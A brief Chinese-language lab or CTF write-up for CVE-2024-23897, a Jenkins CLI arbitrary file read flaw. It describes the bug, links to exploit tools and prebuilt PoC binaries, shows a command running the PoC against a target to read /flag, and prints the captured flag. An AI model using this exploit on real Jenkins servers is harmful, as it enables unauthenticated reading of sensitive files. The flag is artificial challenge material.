CVE-2024-23897
- Jenkins任意文件读取
靶标介绍
Jenkins 2.441及更早版本,以及LTS 2.426.2及更早版本没有禁用其CLI命令解析器的一个功能,该功能会将参数中’@'字符后跟的文件路径替换为该文件的内容,允许未经身份验证的攻击者读取Jenkins控制器文件系统上的任意文件。
漏洞利用
- 使用集成工具
https://github.com/TheBeastofwar/JenkinsExploit-GUI
2. POC下载
直接下载编译好的二进制文件
Linux:
https://github.com/wjlin0/CVE-2024-23897/releases/download/v1.0.1/CVE-2024-23897_1.0.1_linux_amd64.zip
Window:
https://github.com/wjlin0/CVE-2024-23897/releases/download/v1.0.1/CVE-2024-23897_1.0.1_windows_amd64.zip
其他系统Release:
https://github.com/wjlin0/CVE-2024-23897/releases/tag/v1.0.1
CVE-2024-23897.exe -u http://39.106.48.123:41922/ -a /flag
Flag:
flag{3b62b38e-b5c2-4826-8b48-3521c26097ae}
参考文章
https://blog.youkuaiyun.com/HMX404/article/details/142487936
https://www.cnblogs.com/thebeastofwar/p/17991690